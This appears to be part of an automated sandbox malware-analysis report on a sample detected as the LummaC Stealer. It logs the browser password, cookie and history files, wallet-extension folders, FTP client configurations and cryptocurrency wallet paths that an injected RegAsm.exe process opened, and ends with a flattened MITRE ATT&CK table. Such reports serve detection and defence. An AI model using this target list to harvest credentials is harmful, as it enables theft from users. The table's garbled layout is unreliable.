        Tries to harvest and steal browser information (history, passwords, etc)
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.dbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
        Tries to harvest and steal ftp login credentials
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
        Tries to steal Crypto Currency Wallets
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\EWZCVGNOWTJump to behavior

        Remote Access Functionality

        barindex
        Yara detected LummaC Stealer
        Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
        Source: Yara matchFile source: sslproxydump.pcap, type: PCAP

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
        Windows Management Instrumentation        		1
        DLL Side-Loading        		411
        Process Injection        		1
        Masquerading        		2
        OS Credential Dumping        		111
        Security Software Discovery        		Remote Services1
        Archive Collected Data        		21
        Encrypted Channel        		Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts1
        Native API        		Boot or Logon Initialization Scripts1
        DLL Side-Loading        		1
        Disable or Modify Tools        		LSASS Memory1
        Process Discovery        		Remote Desktop Protocol31
        Data from Local System        		11
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        PowerShell        		Logon Script (Windows)Logon Script (Windows)131
        Virtualization/Sandbox Evasion        		Security Account Manager131
        Virtualization/Sandbox Evasion        		SMB/Windows Admin Shares2
        Clipboard Data        		3
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook411
        Process Injection        		NTDS1
        File and Directory Discovery        		Distributed Component Object ModelInput Capture124
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
        Deobfuscate/Decode Files or Information        		LSA Secrets22
        System Information Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
